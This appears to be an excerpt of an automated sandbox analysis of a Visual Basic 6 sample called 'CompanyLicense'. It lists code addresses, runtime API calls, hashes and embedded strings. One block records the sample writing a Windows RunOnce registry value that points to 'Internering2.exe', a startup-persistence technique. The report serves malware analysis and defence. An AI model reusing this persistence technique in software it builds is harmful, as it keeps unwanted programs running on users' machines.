                                      0x0040f543
                                      0x0040f543
                                      0x0040f548
                                      0x0040f54d
                                      0x0040f552
                                      0x0040f552
                                      0x0040f582
                                      0x0040f589
                                      0x0040f58e
                                      0x0040f5a9
                                      0x0040f5af
                                      0x0040f5b1
                                      0x0040f5be
                                      0x0040f5e3
                                      0x0040f5c0
                                      0x0040f5c0
                                      0x0040f5c5
                                      0x0040f5ca
                                      0x0040f5d0
                                      0x0040f5d6
                                      0x0040f5db
                                      0x0040f5db
                                      0x0040f5f1
                                      0x0040f60e
                                      0x0040f5f3
                                      0x0040f5f3
                                      0x0040f5f8
                                      0x0040f5fd
                                      0x0040f602
                                      0x0040f602
                                      0x0040f632
                                      0x0040f639
                                      0x0040f63e
                                      0x0040f659
                                      0x0040f65f
                                      0x0040f661
                                      0x0040f66e
                                      0x0040f693
                                      0x0040f670
                                      0x0040f670
                                      0x0040f675
                                      0x0040f67a
                                      0x0040f680
                                      0x0040f686
                                      0x0040f68b
                                      0x0040f68b
                                      0x0040f6a0
                                      0x0040f6a6
                                      0x0040f6b6
                                      0x0040f6bc
                                      0x0040f6c6
                                      0x0040f6d0
                                      0x0040f6da
                                      0x0040f6e4
                                      0x0040f702
                                      0x0040f709
                                      0x0040f713
                                      0x0040f723
                                      0x0040f730
                                      0x0040f731
                                      0x0040f732
                                      0x0040f733
                                      0x0040f74f
                                      0x0040f755
                                      0x0040f762
                                      0x0040f784
                                      0x0040f764
                                      0x0040f764
                                      0x0040f769
                                      0x0040f76e
                                      0x0040f771
                                      0x0040f777
                                      0x0040f77c
                                      0x0040f77c
                                      0x0040f792
                                      0x0040f799
                                      0x0040f7ce
                                      0x0040f7ed
                                      0x0040f7f2
                                      0x0040f7f5
                                      0x0040f80b
                                      0x0040f811
                                      0x0040f81e
                                      0x0040f840
                                      0x0040f820
                                      0x0040f820
                                      0x0040f825
                                      0x0040f82a
                                      0x0040f82d
                                      0x0040f833
                                      0x0040f838
                                      0x0040f838
                                      0x0040f84d
                                      0x0040f850
                                      0x0040f85e
                                      0x0040f87b
                                      0x0040f860
                                      0x0040f860
                                      0x0040f865
                                      0x0040f86a
                                      0x0040f86f
                                      0x0040f86f
                                      0x0040f89f
                                      0x0040f8a3
                                      0x0040f8a8
                                      0x0040f8c3
                                      0x0040f8c9
                                      0x0040f8cb
                                      0x0040f8d8
                                      0x0040f8fd
                                      0x0040f8da
                                      0x0040f8da
                                      0x0040f8df
                                      0x0040f8e4
                                      0x0040f8ea
                                      0x0040f8f0
                                      0x0040f8f5
                                      0x0040f8f5
                                      0x0040f90b
                                      0x0040f928
                                      0x0040f90d
                                      0x0040f90d
                                      0x0040f912
                                      0x0040f917
                                      0x0040f91c
                                      0x0040f91c
                                      0x0040f94c
                                      0x0040f953
                                      0x0040f958
                                      0x0040f973
                                      0x0040f979
                                      0x0040f97b
                                      0x0040f988
                                      0x0040f9ad
                                      0x0040f98a
                                      0x0040f98a
                                      0x0040f98f
                                      0x0040f994
                                      0x0040f99a
                                      0x0040f9a0
                                      0x0040f9a5
                                      0x0040f9a5
                                      0x0040f9bb
                                      0x0040f9d8
                                      0x0040f9bd
                                      0x0040f9bd
                                      0x0040f9c2
                                      0x0040f9c7
                                      0x0040f9cc
                                      0x0040f9cc
                                      0x0040f9fc
                                      0x0040fa03
                                      0x0040fa08
                                      0x0040fa20
                                      0x0040fa23
                                      0x0040fa25
                                      0x0040fa32
                                      0x0040fa54
                                      0x0040fa34
                                      0x0040fa34
                                      0x0040fa36
                                      0x0040fa3b
                                      0x0040fa41
                                      0x0040fa47
                                      0x0040fa4c
                                      0x0040fa4c
                                      0x0040fa5e
                                      0x0040fa64
                                      0x0040fa6e
                                      0x0040fa74
                                      0x0040fa85
                                      0x0040fa8f
                                      0x0040fa9c
                                      0x0040fa9d
                                      0x0040fa9e
                                      0x0040fa9f
                                      0x0040fab5
                                      0x0040fabb
                                      0x0040fac8
                                      0x0040faea
                                      0x0040faca
                                      0x0040faca
                                      0x0040facf
                                      0x0040fad4
                                      0x0040fad7
                                      0x0040fadd
                                      0x0040fae2
                                      0x0040fae2
                                      0x0040faf7
                                      0x0040fafe
                                      0x0040fb02
                                      0x0040fb03
                                      0x0040fb05
                                      0x0040fb0a
                                      0x0040fb13
                                      0x0040fb18
                                      0x0040fb26
                                      0x0040fb43
                                      0x0040fb28
                                      0x0040fb28
                                      0x0040fb2d
                                      0x0040fb32
                                      0x0040fb37
                                      0x0040fb37
                                      0x0040fb67
                                      0x0040fb6b
                                      0x0040fb70
                                      0x0040fb8b
                                      0x0040fb91
                                      0x0040fb93
                                      0x0040fba0
                                      0x0040fbc5
                                      0x0040fba2
                                      0x0040fba2
                                      0x0040fba7
                                      0x0040fbac
                                      0x0040fbb2
                                      0x0040fbb8
                                      0x0040fbbd
                                      0x0040fbbd
                                      0x0040fbd3
                                      0x0040fbf0
                                      0x0040fbd5
                                      0x0040fbd5
                                      0x0040fbda
                                      0x0040fbdf
                                      0x0040fbe4
                                      0x0040fbe4
                                      0x0040fc14
                                      0x0040fc1b
                                      0x0040fc20
                                      0x0040fc38
                                      0x0040fc3b
                                      0x0040fc3d
                                      0x0040fc4a
                                      0x0040fc6c
                                      0x0040fc4c
                                      0x0040fc4c
                                      0x0040fc4e
                                      0x0040fc53
                                      0x0040fc59
                                      0x0040fc5f
                                      0x0040fc64
                                      0x0040fc64
                                      0x0040fc7a
                                      0x0040fc97
                                      0x0040fc7c
                                      0x0040fc7c
                                      0x0040fc81
                                      0x0040fc86
                                      0x0040fc8b
                                      0x0040fc8b
                                      0x0040fcbb
                                      0x0040fcc2
                                      0x0040fcc7
                                      0x0040fce2
                                      0x0040fce5
                                      0x0040fce7
                                      0x0040fcf4
                                      0x0040fd16
                                      0x0040fcf6
                                      0x0040fcf6
                                      0x0040fcf8
                                      0x0040fcfd
                                      0x0040fd03
                                      0x0040fd09
                                      0x0040fd0e
                                      0x0040fd0e
                                      0x0040fd24
                                      0x0040fd41
                                      0x0040fd26
                                      0x0040fd26
                                      0x0040fd2b
                                      0x0040fd30
                                      0x0040fd35
                                      0x0040fd35
                                      0x0040fd65
                                      0x0040fd6c
                                      0x0040fd71
                                      0x0040fd8c
                                      0x0040fd92
                                      0x0040fd94
                                      0x0040fda1
                                      0x0040fdc6
                                      0x0040fda3
                                      0x0040fda3
                                      0x0040fda8
                                      0x0040fdad
                                      0x0040fdb3
                                      0x0040fdb9
                                      0x0040fdbe
                                      0x0040fdbe
                                      0x0040fdd4
                                      0x0040fdf1
                                      0x0040fdd6
                                      0x0040fdd6
                                      0x0040fddb
                                      0x0040fde0
                                      0x0040fde5
                                      0x0040fde5
                                      0x0040fe0b
                                      0x0040fe15
                                      0x0040fe1c
                                      0x0040fe21
                                      0x0040fe39
                                      0x0040fe3f
                                      0x0040fe41
                                      0x0040fe4e
                                      0x0040fe73
                                      0x0040fe50
                                      0x0040fe50
                                      0x0040fe55
                                      0x0040fe5a
                                      0x0040fe60
                                      0x0040fe66
                                      0x0040fe6b
                                      0x0040fe6b
                                      0x0040fe7d
                                      0x0040fe83
                                      0x0040fe8d
                                      0x0040fe93
                                      0x0040fea3
                                      0x0040fea9
                                      0x0040feb6
                                      0x0040febc
                                      0x0040fec6
                                      0x0040fed6
                                      0x0040fef7
                                      0x0040ff04
                                      0x0040ff05
                                      0x0040ff06
                                      0x0040ff07
                                      0x0040ff1d
                                      0x0040ff32
                                      0x0040ff38
                                      0x0040ff45
                                      0x0040ff67
                                      0x0040ff47
                                      0x0040ff47
                                      0x0040ff4c
                                      0x0040ff51
                                      0x0040ff54
                                      0x0040ff5a
                                      0x0040ff5f
                                      0x0040ff5f
                                      0x0040ff77
                                      0x0040ff7f
                                      0x0040ffa6
                                      0x0040ffbe
                                      0x0040ffc3
                                      0x0040ffc6
                                      0x0040ffd5
                                      0x0040fffc
                                      0x00410008
                                      0x0041000e
                                      0x00410013
                                      0x00410021
                                      0x0041003e
                                      0x00410023
                                      0x00410023
                                      0x00410028
                                      0x0041002d
                                      0x00410032
                                      0x00410032
                                      0x00410062
                                      0x00410066
                                      0x0041006b
                                      0x00410086
                                      0x0041008c
                                      0x0041008e
                                      0x0041009b
                                      0x004100c0
                                      0x0041009d
                                      0x0041009d
                                      0x004100a2
                                      0x004100a7
                                      0x004100ad
                                      0x004100b3
                                      0x004100b8
                                      0x004100b8
                                      0x004100c7
                                      0x004100c9
                                      0x004100cb
                                      0x004100d7
                                      0x004100d8
                                      0x004100dd
                                      0x004100e7
                                      0x00410104
                                      0x004100e9
                                      0x004100e9
                                      0x004100ee
                                      0x004100f3
                                      0x004100f8
                                      0x004100f8
                                      0x00410128
                                      0x0041012f
                                      0x00410134
                                      0x0041014f
                                      0x00410155
                                      0x00410157
                                      0x00410164
                                      0x00410189
                                      0x00410166
                                      0x00410166
                                      0x0041016b
                                      0x00410170
                                      0x00410176
                                      0x0041017c
                                      0x00410181
                                      0x00410181
                                      0x00410197
                                      0x004101b4
                                      0x00410199
                                      0x00410199
                                      0x0041019e
                                      0x004101a3
                                      0x004101a8
                                      0x004101a8
                                      0x004101d8
                                      0x004101df
                                      0x004101e4
                                      0x004101ff
                                      0x00410205
                                      0x00410207
                                      0x00410214
                                      0x00410239
                                      0x00410216
                                      0x00410216
                                      0x0041021b
                                      0x00410220
                                      0x00410226
                                      0x0041022c
                                      0x00410231
                                      0x00410231
                                      0x00410247
                                      0x00410264
                                      0x00410249
                                      0x00410249
                                      0x0041024e
                                      0x00410253
                                      0x00410258
                                      0x00410258
                                      0x00410288
                                      0x0041028f
                                      0x00410294
                                      0x004102af
                                      0x004102b2
                                      0x004102b4
                                      0x004102c1
                                      0x004102e3
                                      0x004102c3
                                      0x004102c3
                                      0x004102c5
                                      0x004102ca
                                      0x004102d0
                                      0x004102d6
                                      0x004102db
                                      0x004102db
                                      0x004102f1
                                      0x0041030e
                                      0x004102f3
                                      0x004102f3
                                      0x004102f8
                                      0x004102fd
                                      0x00410302
                                      0x00410302
                                      0x00410332
                                      0x00410339
                                      0x0041033e
                                      0x00410359
                                      0x0041035f
                                      0x00410361
                                      0x0041036e
                                      0x00410393
                                      0x00410370
                                      0x00410370
                                      0x00410375
                                      0x0041037a
                                      0x00410380
                                      0x00410386
                                      0x0041038b
                                      0x0041038b
                                      0x0041039a
                                      0x0041039c

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 0040E7C8
                                      • #670.MSVBVM60(?,?,?,?,?,004012E6), ref: 0040E813
                                      • __vbaVarTstEq.MSVBVM60(00008008,?), ref: 0040E83A
                                      • __vbaFreeVar.MSVBVM60(00008008,?), ref: 0040E84C
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010,00008008,?), ref: 0040E87A
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E8B3
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000158), ref: 0040E8FD
                                      • #529.MSVBVM60(00000008), ref: 0040E93B
                                      • __vbaFreeObj.MSVBVM60(00000008), ref: 0040E943
                                      • __vbaFreeVar.MSVBVM60(00000008), ref: 0040E94E
                                      • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0040E999
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403918,000006F8), ref: 0040E9ED
                                      • __vbaFreeVar.MSVBVM60(00000000,?,00403918,000006F8), ref: 0040EA07
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040EA4B
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EA84
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403AC4,00000078), ref: 0040EACB
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040EAF2
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EB2E
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000130), ref: 0040EB7B
                                      • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040EBA0
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010,?,?,?,004012E6), ref: 0040EBBB
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EBF7
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000118), ref: 0040EC44
                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0040EC75
                                      • __vbaStrMove.MSVBVM60(?), ref: 0040EC7F
                                      • __vbaVarDup.MSVBVM60(?), ref: 0040ECB0
                                      • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,v6_,?,00007259,?), ref: 0040ED10
                                      • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,?,?,?,?,v6_,?,00007259,?), ref: 0040ED30
                                      • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,004012E6), ref: 0040ED48
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010,?,?,?,?,?,?,?,?,?,?,?,004012E6), ref: 0040ED6A
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EDA3
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,000000F8), ref: 0040EDF0
                                      • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040EE15
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040EE30
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EE6C
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000158), ref: 0040EEB6
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040EEDD
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EF19
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000160), ref: 0040EF66
                                      • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040EF8B
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040EFA6
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EFE2
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000158), ref: 0040F02C
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040F053
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F08F
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000080), ref: 0040F0DC
                                      • __vbaStrMove.MSVBVM60(00000000,?,00403AC4,00000080), ref: 0040F11C
                                      • __vbaI4Var.MSVBVM60(?), ref: 0040F128
                                      • __vbaI4Var.MSVBVM60(?,?), ref: 0040F15D
                                      • __vbaChkstk.MSVBVM60(?,00000008,?,?,00084AC3,?,?,?), ref: 0040F1A6
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403918,000006FC), ref: 0040F1F6
                                      • __vbaFreeStr.MSVBVM60(00000000,?,00403918,000006FC), ref: 0040F20D
                                      • __vbaFreeObjList.MSVBVM60(00000007,?,?,?,?,?,?,?), ref: 0040F242
                                      • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 0040F261
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040F283
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F2BC
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000060), ref: 0040F303
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040F32A
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F366
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000060), ref: 0040F3AD
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040F3D4
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F410
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000138), ref: 0040F45D
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040F484
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F4C0
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000130), ref: 0040F50D
                                      • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040F532
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040F54D
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F589
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000118), ref: 0040F5D6
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040F5FD
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F639
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000178), ref: 0040F686
                                      • __vbaStrVarMove.MSVBVM60(?,00000003,?,?), ref: 0040F709
                                      • __vbaStrMove.MSVBVM60(?,00000003,?,?), ref: 0040F713
                                      • __vbaChkstk.MSVBVM60(00000003,00000000,?,00000003,?,?), ref: 0040F723
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403918,00000700), ref: 0040F777
                                      • __vbaFreeStr.MSVBVM60(00000000,?,00403918,00000700), ref: 0040F799
                                      • __vbaFreeObjList.MSVBVM60(00000007,?,?,?,?,?,?,?), ref: 0040F7CE
                                      • __vbaFreeVarList.MSVBVM60(00000003,00000003,?,?), ref: 0040F7ED
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403918,00000704), ref: 0040F833
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040F86A
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F8A3
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403AC4,00000188), ref: 0040F8F0
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040F917
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F953
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000140), ref: 0040F9A0
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040F9C7
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FA03
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000050), ref: 0040FA47
                                      • __vbaChkstk.MSVBVM60(00000000,?,00403AC4,00000050), ref: 0040FA8F
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403918,00000708), ref: 0040FADD
                                      • __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0040FB05
                                      • __vbaFreeVar.MSVBVM60 ref: 0040FB13
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040FB32
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FB6B
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000188), ref: 0040FBB8
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040FBDF
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FC1B
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000048), ref: 0040FC5F
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040FC86
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FCC2
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000068), ref: 0040FD09
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040FD30
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FD6C
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000130), ref: 0040FDB9
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040FDE0
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FE1C
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000108), ref: 0040FE66
                                      • __vbaChkstk.MSVBVM60(00000008,F0230230,00005AFA,?), ref: 0040FEF7
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403918,0000070C,?,?,?,0024158F,00000008,F0230230,00005AFA,?), ref: 0040FF5A
                                      • __vbaVarMove.MSVBVM60(?,?,?,0024158F,00000008,F0230230,00005AFA,?), ref: 0040FF77
                                      • __vbaFreeStr.MSVBVM60(?,?,?,0024158F,00000008,F0230230,00005AFA,?), ref: 0040FF7F
                                      • __vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,?,?,?,?,0024158F,00000008,F0230230,00005AFA,?), ref: 0040FFA6
                                      • __vbaFreeVarList.MSVBVM60(00000002,00000009,00000008), ref: 0040FFBE
                                      • __vbaStrCopy.MSVBVM60 ref: 0040FFD5
                                      • __vbaFreeStr.MSVBVM60 ref: 0041000E
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0041002D
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410066
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,000000F8), ref: 004100B3
                                      • __vbaLateIdCallLd.MSVBVM60(00000009,?,00000000,00000000), ref: 004100D8
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 004100F3
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041012F
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000118), ref: 0041017C
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 004101A3
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 004101DF
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000140), ref: 0041022C
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 00410253
                                      • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0041028F
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000068), ref: 004102D6
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 004102FD
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410339
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,000000F8), ref: 00410386
                                      • __vbaLateIdCallLd.MSVBVM60(00000008,?,00000000,00000000), ref: 004103AB
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 004103C6
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410402
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,000000A0), ref: 0041044F
                                      • __vbaStrCopy.MSVBVM60(00000000,?,00403AC4,000000A0), ref: 0041046B
                                      • __vbaI4Var.MSVBVM60(00000009), ref: 00410491
                                      • __vbaI4Var.MSVBVM60(00000008,?,?,00000009), ref: 004104B0
                                      • __vbaVarMove.MSVBVM60 ref: 00410500
                                      • __vbaFreeStr.MSVBVM60 ref: 00410508
                                      • __vbaFreeObjList.MSVBVM60(00000008,?,?,?,00000000,?,?,?,?), ref: 00410544
                                      • __vbaFreeVarList.MSVBVM60(00000002,00000009,00000008), ref: 0041055C
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0041057E
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 004105B7
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,000000A0), ref: 00410604
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0041062B
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410667
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,000000F8), ref: 004106B4
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 004106DB
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410717
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000078), ref: 0041075E
                                      • __vbaChkstk.MSVBVM60(?,?), ref: 0041080E
                                      • __vbaChkstk.MSVBVM60(?,00000009,7C207E50,00005AFD,?,?,?), ref: 00410841
                                      • __vbaChkstk.MSVBVM60(?,00000009,7C207E50,00005AFD,?,?,?), ref: 00410855
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403918,00000710), ref: 00410896
                                      • __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004108D0
                                      • __vbaFreeVar.MSVBVM60 ref: 004108DE
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 004108FD
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410936
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000178), ref: 00410983
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 004109AA
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 004109E6
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000118), ref: 00410A33
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403918,00000714,?,?,000044D0,?,00005633,?,?), ref: 00410AD0
                                      • __vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,000044D0,?,00005633,?,?), ref: 00410AFC
                                      • __vbaFreeVar.MSVBVM60 ref: 00410B0A
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 00410B29
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410B62
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000078), ref: 00410BA9
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 00410BD0
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410C0C
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000060), ref: 00410C53
                                      • __vbaStrCopy.MSVBVM60(00000000,?,00403AC4,00000060), ref: 00410C91
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403918,00000718,?,?,00000000,?,00855264,0009EC81,?), ref: 00410CEF
                                      • __vbaFreeStr.MSVBVM60(?,?,00000000,?,00855264,0009EC81,?), ref: 00410D06
                                      • __vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000,?,00855264,0009EC81,?), ref: 00410D18
                                      • __vbaOnError.MSVBVM60(000000FF), ref: 00410D29
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004038E8,000002B4), ref: 00410D67
                                      • __vbaFreeVar.MSVBVM60(00410E74), ref: 00410E66
                                      • __vbaFreeVar.MSVBVM60(00410E74), ref: 00410E6E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$CheckHresult$New2$Free$List$Chkstk$Move$CallLate$Copy$#529#670Error
                                      • String ID: 3V$BEMISTED$CALICUT$Misbaptize8$OVERGLAMORIZED$SMAAKRAVLET$Tilsjoflingerne9$adkomsthavers$o[>$udsanering$v6_
                                      • API String ID: 1286334570-3999088872
                                      • Opcode ID: fbbd0a40cc8fde54ade90055eb1f579cb741d647193e20425336da36bd4c770b
                                      • Instruction ID: dd565bdb4996f2a50941cfbe9d613efc03694ef50a104e56decc6033536a50dd
                                      • Opcode Fuzzy Hash: fbbd0a40cc8fde54ade90055eb1f579cb741d647193e20425336da36bd4c770b
                                      • Instruction Fuzzy Hash: 9333E371900228EFDB21DF50CC89BD9BBB8BB08305F1041EAE549BB2A1DB795B85DF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • RegCreateKeyExA.KERNELBASE(80000001,020A53C6,00000000,00000000,00000000,000F003F,00000000,68F644E8,?,020A13FB,?,?,00000000,000000FF,00000007,68F6454C), ref: 020A1C43
                                        • Part of subcall function 020A1C64: RegSetValueExA.KERNELBASE(68F644E8,020A53BB,00000000,00000001,?,?,?,00000062,?,?,?,?,?,020A5210,020A555C,020A4170), ref: 020A1C74
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: CreateValue
                                      • String ID: Hamid$Software\Microsoft\Windows\CurrentVersion\RunOnce$\Internering2.exe$jjj$R7
                                      • API String ID: 2259555733-3584740790
                                      • Opcode ID: 246c093a9238cfc98265307970185839d6899a5416886dcb48ac1306a6385e54
                                      • Instruction ID: 07c5350f442f957dfd17c04128d5cb0179eaf1771cfb39438faf7a0b0e6c96b8
                                      • Opcode Fuzzy Hash: 246c093a9238cfc98265307970185839d6899a5416886dcb48ac1306a6385e54
                                      • Instruction Fuzzy Hash: E611AA318083C42FD7018BA04E2A7D87F66BF43719FE9918AE5882F0F3D7206501E34A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 908 401480-4014a4 #100
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: #100
